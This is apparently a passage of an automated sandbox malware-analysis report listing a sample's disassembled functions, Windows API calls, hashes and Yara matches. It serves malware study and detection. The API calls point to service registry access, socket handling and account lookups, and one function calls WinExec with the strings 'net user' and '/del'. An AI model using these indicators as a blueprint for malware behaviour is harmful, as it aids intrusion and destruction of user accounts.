                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@??3@$Open
                                • String ID:
                                • API String ID: 2374869923-0
                                • Opcode ID: 7532c89eedc79a481d8bda5d46ac26f2cc1cf5e389e941ce04d86380d7f123a9
                                • Instruction ID: 32baaf49ce42a5a358fea7d510f57c92a2b0a776ecfe257346ecd251500ef787
                                • Opcode Fuzzy Hash: 7532c89eedc79a481d8bda5d46ac26f2cc1cf5e389e941ce04d86380d7f123a9
                                • Instruction Fuzzy Hash: B631D5766046845BE718DF28CC91A6BB3D6FBC8750F44492CF91693381EB36EE09C792
                                Function 1000EE30 Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                Download Yara Rule
                                APIs
                                • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1006A068,000000FF), ref: 1000EE96
                                  • Part of subcall function 1000E520: RegOpenKeyExA.ADVAPI32(?,00000000,00000000,000F003F,100109E5,00000000,100109E5,?,SYSTEM\CurrentControlSet\Services\%s,00000000,80000002,00000000,?,?), ref: 1000E538
                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 1000EEE8
                                • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1006A068,000000FF), ref: 1000EEF8
                                • ??3@YAXPAX@Z.MSVCRT(?), ref: 1000EF52
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@??3@$Open
                                • String ID:
                                • API String ID: 2374869923-0
                                • Opcode ID: 4de5b2bcd11564635852ac1862835492fbd04a804923473cb2cbacd37bbce42b
                                • Instruction ID: 529d2750a5032d3fa2bb58871a274eaf41767a3587e5389a20a4cf427fd15475
                                • Opcode Fuzzy Hash: 4de5b2bcd11564635852ac1862835492fbd04a804923473cb2cbacd37bbce42b
                                • Instruction Fuzzy Hash: 5331F5762046895BD308DE24C85166BB3D6FBC8750F44493CFA1693381DB36ED09C752
                                Function 100117E0 Relevance: 6.1, APIs: 4, Instructions: 111COMMON
                                Download Yara Rule
                                APIs
                                • LookupAccountSidA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000001,00000000), ref: 1001188D
                                • LookupAccountSidA.ADVAPI32(00000000,?,00000008,00000000,?,00000001,00000000), ref: 100118D3
                                • wsprintfA.USER32 ref: 10011901
                                • 741324A0.WTSAPI32(?), ref: 10011917
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: AccountLookup$741324wsprintf
                                • String ID:
                                • API String ID: 3699563385-0
                                • Opcode ID: 8ed260b9186e04422498aef0bc553d55f17dcaeb644841c3a8f9ac8f5b1bf6c0
                                • Instruction ID: 75ed8c1a40449dc84bd528c53c0faca8b09c11902cbaf50b3a4e55cf154f28bc
                                • Opcode Fuzzy Hash: 8ed260b9186e04422498aef0bc553d55f17dcaeb644841c3a8f9ac8f5b1bf6c0
                                • Instruction Fuzzy Hash: F5316D71208346AFE714CE55C8D4DABB3E9FBC8244F404E2DF68997240EA70ED498B62
                                Function 100034D0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                Download Yara Rule
                                APIs
                                • RtlEnterCriticalSection.NTDLL(?), ref: 100034DE
                                • RtlLeaveCriticalSection.NTDLL(?), ref: 100034F4
                                • memmove.MSVCRT(00000000,?,00000000,?,?,?,?,10003C99,?,00000005,00000005,00000000,?,?,?,?), ref: 10003545
                                • RtlLeaveCriticalSection.NTDLL(?), ref: 1000356B
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalSection$Leave$Entermemmove
                                • String ID:
                                • API String ID: 72348100-0
                                • Opcode ID: 9319d6ca4cf1f7743dc80d861c7da3a57f412d66edda9e2185804d81a0dc3cd4
                                • Instruction ID: 41d1a370f2508b90d1dbac8cc85ef313bd04c1718ccfcefffe6925d1250f8bb9
                                • Opcode Fuzzy Hash: 9319d6ca4cf1f7743dc80d861c7da3a57f412d66edda9e2185804d81a0dc3cd4
                                • Instruction Fuzzy Hash: 7D11B2363047149BEB05EF749C9946FBBDDEB45291700842DF90397356EE61ED088690
                                Function 1000E800 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                Download Yara Rule
                                APIs
                                • LocalSize.KERNEL32(00000000), ref: 1000E86E
                                • LocalFree.KERNEL32(00000000,00000000,00000000), ref: 1000E87A
                                • LocalSize.KERNEL32(00000000), ref: 1000E895
                                • LocalFree.KERNEL32(00000000,00000000,00000000), ref: 1000E8A1
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$FreeSize
                                • String ID:
                                • API String ID: 2726095061-0
                                • Opcode ID: 73ed662e9077a12b636155e595c78231a86c37c4a05c0cf786f9a6ba96991d1d
                                • Instruction ID: 4cc34419d7a70d166c584db2d14c90f329438d3833b5948d6052ee62cb9623d3
                                • Opcode Fuzzy Hash: 73ed662e9077a12b636155e595c78231a86c37c4a05c0cf786f9a6ba96991d1d
                                • Instruction Fuzzy Hash: 3711BE75105A909BF225EB14CC92BFFB39DEF85390F044A29F955A3288CF34AC05C7A2
                                Function 00401520 Relevance: 6.1, APIs: 4, Instructions: 56memoryCOMMON
                                Download Yara Rule
                                APIs
                                • FreeLibrary.KERNEL32(?,00000000,00000000,00025AE0,00401127,00000000,?,00000000,0040171B,?), ref: 00401570
                                • VirtualFree.KERNEL32(5D5E5FC0,00000000,00008000,00025AE0,00401127,00000000,?,00000000,0040171B,?), ref: 00401597
                                • GetProcessHeap.KERNEL32(00000000,00401127,00025AE0,00401127,00000000,?,00000000,0040171B,?), ref: 004015A0
                                • HeapFree.KERNEL32(00000000,?,00000000,0040171B,?), ref: 004015A7
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: Free$Heap$LibraryProcessVirtual
                                • String ID:
                                • API String ID: 548792435-0
                                • Opcode ID: e9e061fe8da8502694f74ff8a4bd2ba7532c858e7373bff758fa61282ed922f1
                                • Instruction ID: 2d8dcf72d340e61f505ec02cbb84714f2cdd3d0f75e656bd935d2cd45be4ba94
                                • Opcode Fuzzy Hash: e9e061fe8da8502694f74ff8a4bd2ba7532c858e7373bff758fa61282ed922f1
                                • Instruction Fuzzy Hash: 91113C71740701ABD720CB6ADC85F17B7E8AF88750F054929F55BEB2E0CB34E8418B58
                                Function 10003880 Relevance: 6.0, APIs: 4, Instructions: 47synchronizationnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • WaitForSingleObject.KERNEL32(?,000000FF,00000000,76F92EE0,?,00000000,10069CEC,000000FF,100027A0), ref: 100038BC
                                • CloseHandle.KERNEL32(?), ref: 100038DF
                                • CloseHandle.KERNEL32(?), ref: 100038E8
                                • WSACleanup.WS2_32 ref: 100038EA
                                  • Part of subcall function 10003DB0: setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10003DDA
                                  • Part of subcall function 10003DB0: CancelIo.KERNEL32(?), ref: 10003DE7
                                  • Part of subcall function 10003DB0: InterlockedExchange.KERNEL32(?,00000000), ref: 10003DF6
                                  • Part of subcall function 10003DB0: closesocket.WS2_32(?), ref: 10003E03
                                  • Part of subcall function 10003DB0: SetEvent.KERNEL32(?), ref: 10003E10
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$CancelCleanupEventExchangeInterlockedObjectSingleWaitclosesocketsetsockopt
                                • String ID:
                                • API String ID: 136543108-0
                                • Opcode ID: 3baf7999bc17034cde08045e60d2599934fcebe03a3ba73ab888b9dc19cb423c
                                • Instruction ID: 93ec0bc8b686358acc24e3714501cd84e213c2281eabc8766456639a8591c71b
                                • Opcode Fuzzy Hash: 3baf7999bc17034cde08045e60d2599934fcebe03a3ba73ab888b9dc19cb423c
                                • Instruction Fuzzy Hash: C3115E34104B919FE312DB24C844B5BB7E9EB85724F408A0DF0A6566D1CBB868098BA2
                                Function 1000B030 Relevance: 6.0, APIs: 4, Instructions: 35registrystringCOMMON
                                Download Yara Rule
                                APIs
                                • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 1000B04E
                                • lstrlen.KERNEL32(?), ref: 1000B05E
                                • RegSetValueExA.ADVAPI32(?,?,00000000,00000002,?,00000000), ref: 1000B074
                                • RegCloseKey.ADVAPI32(?), ref: 1000B084
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateValuelstrlen
                                • String ID:
                                • API String ID: 1356686001-0
                                • Opcode ID: 6f469cda0b208e0ca63033edd93a9e46ed06a8d285518f132b144785bc4708a2
                                • Instruction ID: 7b49051102f8b3a7e04b5e6a6f77e5ac8f95ad15ac6f50b5fbf7acef8fa67196
                                • Opcode Fuzzy Hash: 6f469cda0b208e0ca63033edd93a9e46ed06a8d285518f132b144785bc4708a2
                                • Instruction Fuzzy Hash: 50F0D0753443527FF620CB50CD89F6B77EDEB88B50F108908F685A6190D6B0FD418B66
                                Function 100114A0 Relevance: 6.0, APIs: 4, Instructions: 34sleepthreadCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNEL32(00000001), ref: 100114BF
                                • TerminateThread.KERNEL32(?,00000000), ref: 100114D8
                                • Sleep.KERNEL32(00000001), ref: 100114E0
                                • TerminateProcess.KERNEL32(?,00000001), ref: 100114E8
                                  • Part of subcall function 10003DB0: setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10003DDA
                                  • Part of subcall function 10003DB0: CancelIo.KERNEL32(?), ref: 10003DE7
                                  • Part of subcall function 10003DB0: InterlockedExchange.KERNEL32(?,00000000), ref: 10003DF6
                                  • Part of subcall function 10003DB0: closesocket.WS2_32(?), ref: 10003E03
                                  • Part of subcall function 10003DB0: SetEvent.KERNEL32(?), ref: 10003E10
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: SleepTerminate$CancelEventExchangeInterlockedProcessThreadclosesocketsetsockopt
                                • String ID:
                                • API String ID: 3242870944-0
                                • Opcode ID: 8e484390c704dc857f177f1c773443b864ffa47019b696dc8a7e0cee6581ed40
                                • Instruction ID: c378b0861d785e21301bdfc87bc3ab075883bb077402934db3b02ae2e10452dd
                                • Opcode Fuzzy Hash: 8e484390c704dc857f177f1c773443b864ffa47019b696dc8a7e0cee6581ed40
                                • Instruction Fuzzy Hash: D9F03732200350ABE310EB65CC85F5BB3A5BB88720F004A1DF6959B2D0D7B0E8448B51
                                Function 100067F0 Relevance: 6.0, APIs: 4, Instructions: 16threadwindowCOMMON
                                Download Yara Rule
                                APIs
                                • GetInputState.USER32 ref: 100067F3
                                • GetCurrentThreadId.KERNEL32 ref: 100067FF
                                • PostThreadMessageA.USER32(00000000), ref: 10006806
                                • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 10006817
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessageThread$CurrentInputPostState
                                • String ID:
                                • API String ID: 2517755969-0
                                • Opcode ID: f068882617931f03d063f58f9d32d767fe4a38755a4332fb425594b53d04b317
                                • Instruction ID: be37903158f8ce1355c4e343a4486a1e9724d5febc653840301b138d8f38b73e
                                • Opcode Fuzzy Hash: f068882617931f03d063f58f9d32d767fe4a38755a4332fb425594b53d04b317
                                • Instruction Fuzzy Hash: 60D0C77168036077FB107BE48C4FF463A297B04B01F900454F705DA1E1D6F456148B67
                                Function 10069340 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 174comCOMMON
                                Download Yara Rule
                                APIs
                                • CoCreateInstance.OLE32(10077218,00000000,00000001,10077188,00000000,00000000,?,10068F9D,?,?,?,?), ref: 10069393
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateInstance
                                • String ID: FriendlyName
                                • API String ID: 542301482-3623505368
                                • Opcode ID: 9d1032148119b2da218872289ef4e99e1cb5796a42506ce89b41a72a847b9d01
                                • Instruction ID: 258e8a263c28d7347944fa1d558e3935b77094b7b272d9d199a9c21f0b65fa88
                                • Opcode Fuzzy Hash: 9d1032148119b2da218872289ef4e99e1cb5796a42506ce89b41a72a847b9d01
                                • Instruction Fuzzy Hash: 26512671204241AFC700DF58C8C4E9AB7EAFBC9724F508A6DF5998B251C735EC86CB62
                                Function 00404990 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                Download Yara Rule
                                APIs
                                • GetCPInfo.KERNEL32(?,00000000), ref: 004049A4
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: Info
                                • String ID: $
                                • API String ID: 1807457897-3032137957
                                • Opcode ID: ae83eec624f04b339c206aedc32f167b1e4519e52e6f01105cbc9eef7ef967dd
                                • Instruction ID: b87dcbb75cd3c471051da0e28ff986719ac4621f1c2140c0425cb5d80edd0c9f
                                • Opcode Fuzzy Hash: ae83eec624f04b339c206aedc32f167b1e4519e52e6f01105cbc9eef7ef967dd
                                • Instruction Fuzzy Hash: 774167B12041585EFB12C660DD49BFB3FB89B46700FD400F6D649EA1D2C2794918CBAE
                                Function 1004C750 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: _ftol
                                • String ID: *,
                                • API String ID: 2545261903-327129236
                                • Opcode ID: f28266acba0517d0ef76b8f63368f88f2e3b972e201cca309f8e098b87e9ab43
                                • Instruction ID: accb0fd77c38b38dac35c35713d96fe46105689da0a5d4e94071b2b8a9246534
                                • Opcode Fuzzy Hash: f28266acba0517d0ef76b8f63368f88f2e3b972e201cca309f8e098b87e9ab43
                                • Instruction Fuzzy Hash: 1E11E676B082295BD350CF2AD88069E7BE5EB85BE1F32413AE408D7211D7319C948FD6
                                Function 1000B2A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68processCOMMON
                                Download Yara Rule
                                APIs
                                • WinExec.KERNEL32(00000000,00000000), ref: 1000B346
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exec
                                • String ID: /del$net user
                                • API String ID: 459137531-2512890511
                                • Opcode ID: 78dea157b794ebc47affa29f65fdeb0e2daad498c184a7a1bd52b5e36626c8a0
                                • Instruction ID: 5dd7e995ff607eb42942ab6a2a69a7874cb309585a325c5644f1848542d2a52f
                                • Opcode Fuzzy Hash: 78dea157b794ebc47affa29f65fdeb0e2daad498c184a7a1bd52b5e36626c8a0
                                • Instruction Fuzzy Hash: 3B11BE36600A045BD718CA78D89066BB6D2FBC4330F148B3EFA66C32D0EEB59D49C245
                                Function 1000CB5E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON
                                Download Yara Rule
                                APIs
                                • EnumWindows.USER32(Function_0000C600,00000000), ref: 1000CB8E
                                  • Part of subcall function 10003E30: _ftol.MSVCRT ref: 10003E6F
                                  • Part of subcall function 10003E30: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 10003E79
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@EnumWindows_ftol
                                • String ID: {$|
                                • API String ID: 1507428005-264143378
                                • Opcode ID: 3e740fe28869a124bf14874d3fa4f51034db2774c9377083249108f83c0ded99
                                • Instruction ID: b21fffd7c8efe6577bddb62a25c2f06230fca87104460267a0584959008793d5
                                • Opcode Fuzzy Hash: 3e740fe28869a124bf14874d3fa4f51034db2774c9377083249108f83c0ded99
                                • Instruction Fuzzy Hash: F301DB32604188DFE714DF68D85ABAEB7D5FB84310F40826EE90A972C1CBB55E05C750
                                Function 10006830 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
                                Download Yara Rule
                                APIs
                                • GetSystemDirectoryA.KERNEL32(?,00000100), ref: 10006843
                                • sprintf.MSVCRT ref: 1000688E
                                Strings
                                • \Program Files\Internet Explorer\IEXPLORE.EXE, xrefs: 10006849
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: DirectorySystemsprintf
                                • String ID: \Program Files\Internet Explorer\IEXPLORE.EXE
                                • API String ID: 2264545904-1152295267
                                • Opcode ID: f076004f84cb907a7609523adf1ec212d4f6e7c5108ce2d61a9f53a1d08a3bc1
                                • Instruction ID: 99df4ed59750c9dd993d51c468aa5d343e53be9d723c6599038c39a96e95830f
                                • Opcode Fuzzy Hash: f076004f84cb907a7609523adf1ec212d4f6e7c5108ce2d61a9f53a1d08a3bc1
                                • Instruction Fuzzy Hash: 8DF0F6326042042BD3188678DC99BDB7B8AEBC4331F54872EFAA6872C0D9B98908C255
                                Function 1000B3C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32processCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
